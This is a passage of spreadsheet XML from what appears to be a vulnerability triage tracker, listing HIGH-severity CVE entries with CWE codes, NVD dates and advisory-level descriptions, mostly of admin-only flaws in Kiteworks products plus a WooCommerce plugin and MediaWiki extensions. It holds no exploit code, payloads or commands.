          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Remote Code Execution. Kiteworks Email Protection Gateway allowed an authenticated administrator to import configuration whose contents were not sufficiently validated before being processed. A crafted submission could potentially allow arbitrary commands to be executed on the affected gateway.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102097</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102098</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to SQL Injection. A stored SQL injection vulnerability in a Kiteworks administrative reporting feature could allow an authenticated administrator to read sensitive data from the underlying database and to affect the availability of the service. Exploitation requires an existing, authenticated administrative account with access to the affected reporting function.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102098</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102099</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Arbitrary File Write. An improper restriction of a user-supplied file path in a Kiteworks administrative export feature could allow an authenticated administrator to write a file to an arbitrary location on the underlying host, potentially leading to command execution on the appliance. Exploitation requires an existing, authenticated administrative account with access to the affected export function.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102099</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102108</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator of Kiteworks Email Protection Gateway could submit a crafted serialized object to a cluster management interface that was deserialized without sufficient validation, potentially allowing arbitrary code execution in the context of the gateway service account. Exploitation requires an administrator account holding a specific queue-management privilege.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102108</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102114</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in Kiteworks could allow a high-privileged authenticated administrator to execute arbitrary operating-system commands as root on the affected appliance node. Successful exploitation requires an administrative account with elevated privileges.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102114</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102116</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-91</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>-A weakness could have allowed an authenticated Kiteworks Email Protection Gateway administrator to write a file outside its intended location and cause the application to execute it, potentially resulting in remote code execution as the underlying service account.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102116</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102117</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-807, CWE-940</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>On deployments where the remote-support capability is licensed and enabled, an authenticated System Administrator who also possessed the key protecting the submitted data could redirect the underlying system's outbound support connection to a destination of their choosing. That destination could then have operating-system commands executed on the node and receive their output, potentially resulting in remote code execution with the privileges of a local service account.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102117</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102119</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>A path traversal weakness in an optional, non-default administrative feature allowed an authenticated administrator to move files to unintended locations outside the feature's designated directory. This could potentially be leveraged to execute arbitrary code on the underlying system.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102119</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102129</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>A user-provisioning interface in Kiteworks Core did not verify that the requesting administrator was entitled to grant the role being assigned. An administrator whose delegated permissions covered role changes alone could therefore raise an account to full system-administrator privileges.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102129</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102130</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway did not sufficiently validate the content of an uploaded backup, and allowed an administrator to influence how the application loaded it. An authenticated administrator could potentially use this to execute arbitrary code on the gateway as the underlying service account.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102130</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102131</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-94</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway rejected certain configuration settings, but its validation did not recognize every form in which they could be supplied. An authenticated administrator could potentially use an unrecognized form to have a file of their choosing written to the gateway and executed, resulting in code execution as the gateway service account.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102131</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102132</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>An administrative import function in Kiteworks Core did not verify that the requesting administrator was entitled to create the privileged integration credential being imported. A delegated administrator holding a single narrowly scoped administrative permission could therefore obtain full system administrator privileges, without any action by an existing system administrator.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102132</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102142</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A system notification template on the Kiteworks appliance was rendered by a template engine that evaluated expressions contained in the stored template body. An authenticated System Administrator could potentially store a crafted template that executed operating-system commands on the appliance when the notification was next sent.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102142</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102150</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A function in the Kiteworks Advanced Forms component was reachable without authentication. An unauthenticated attacker could potentially use it to carry out a limited set of internal service operations on the Kiteworks platform; it did not permit access to user accounts, stored files, or form submissions.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102150</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102392</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Extra Product Options For WooCommerce | Custom Product Addons and Fields &lt;= 3.3.8 versions.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102392</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103441</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in The Wikimedia Foundation MediaWiki Wikibase extension allows Leverage Executable Code in Non-Executable Files.
This issue affects MediaWiki Wikibase extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103441</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103442</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>External control of system or configuration setting vulnerability in The Wikimedia Foundation MediaWiki CentralAuth extension allows Code Injection.
This issue affects MediaWiki CentralAuth extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103442</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79625</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
